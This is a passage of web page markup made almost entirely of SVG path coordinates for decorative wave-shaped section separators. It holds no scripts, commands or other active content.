d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n      <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.